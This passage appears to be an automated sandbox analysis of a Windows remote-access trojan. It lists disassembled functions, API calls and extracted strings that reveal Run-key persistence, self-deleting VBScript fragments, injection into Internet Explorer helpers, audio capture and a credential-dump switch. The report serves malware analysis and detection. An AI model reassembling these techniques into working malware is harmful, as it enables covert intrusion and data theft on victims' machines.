                                • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                                Function 0040BFDE Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 281registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                  • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                  • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                • ExitProcess.KERNEL32 ref: 0040C389
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                • API String ID: 1861856835-1953526029
                                • Opcode ID: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                                • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                                • Opcode Fuzzy Hash: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                                • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                                Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                  • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                • Sleep.KERNEL32(000001F4), ref: 004110E7
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                • GetCurrentProcessId.KERNEL32 ref: 00411114
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                • API String ID: 2649220323-71629269
                                • Opcode ID: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                                • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                                • Opcode Fuzzy Hash: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                                • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                                Function 0040BC59 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 259registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                  • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                  • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                • ExitProcess.KERNEL32 ref: 0040BFD7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$05Mw`Mw$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                • API String ID: 3797177996-3625296328
                                • Opcode ID: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                                • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                • Opcode Fuzzy Hash: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                                • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                Function 0040B871 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 296fileCOMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 0040B882
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                • _wcslen.LIBCMT ref: 0040B968
                                • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                • _wcslen.LIBCMT ref: 0040BA25
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                • ExitProcess.KERNEL32 ref: 0040BC36
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                • API String ID: 2743683619-2376316431
                                • Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                                • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                • Opcode Fuzzy Hash: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                                • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                                Function 00418FFD Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                • SetEvent.KERNEL32 ref: 004191CF
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                • CloseHandle.KERNEL32 ref: 004191F0
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                • API String ID: 738084811-1354618412
                                • Opcode ID: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                                • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                                • Opcode Fuzzy Hash: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                                • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                                Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
                                • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                Function 004137DC Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                                • API String ID: 2490988753-3443138237
                                • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                Function 0044C60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable$_wcschr
                                • String ID:
                                • API String ID: 3899193279-0
                                • Opcode ID: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                                • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                • Opcode Fuzzy Hash: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                                • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                • _free.LIBCMT ref: 0044E4DF
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044E501
                                • _free.LIBCMT ref: 0044E516
                                • _free.LIBCMT ref: 0044E521
                                • _free.LIBCMT ref: 0044E543
                                • _free.LIBCMT ref: 0044E556
                                • _free.LIBCMT ref: 0044E564
                                • _free.LIBCMT ref: 0044E56F
                                • _free.LIBCMT ref: 0044E5A7
                                • _free.LIBCMT ref: 0044E5AE
                                • _free.LIBCMT ref: 0044E5CB
                                • _free.LIBCMT ref: 0044E5E3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID: pF
                                • API String ID: 161543041-2973420481
                                • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                  • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                • Sleep.KERNEL32(00000064), ref: 00411C63
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$$.F$@#G$@#G
                                • API String ID: 1223786279-2596709126
                                • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: pF
                                • API String ID: 269201875-2973420481
                                • Opcode ID: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
                                • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                • Opcode Fuzzy Hash: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
                                • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                Function 0040DE34 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 223processsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                  • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                • API String ID: 193334293-3226144251
                                • Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                                • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                • Opcode Fuzzy Hash: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                                • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                Function 0041A419 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                                • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                • API String ID: 1332880857-3714951968
                                • Opcode ID: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                                • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                                • Opcode Fuzzy Hash: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                                • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                                Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                Download Yara Rule
                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                • GetCursorPos.USER32(?), ref: 0041B39E
                                • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                • ExitProcess.KERNEL32 ref: 0041B41A
                                • CreatePopupMenu.USER32 ref: 0041B420
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                • Opcode ID: 543c517478803d648db1551973bdeb7e45e3e7bd29ee356e71c77ae2fe33fa89
                                • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                • Opcode Fuzzy Hash: 543c517478803d648db1551973bdeb7e45e3e7bd29ee356e71c77ae2fe33fa89
                                • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
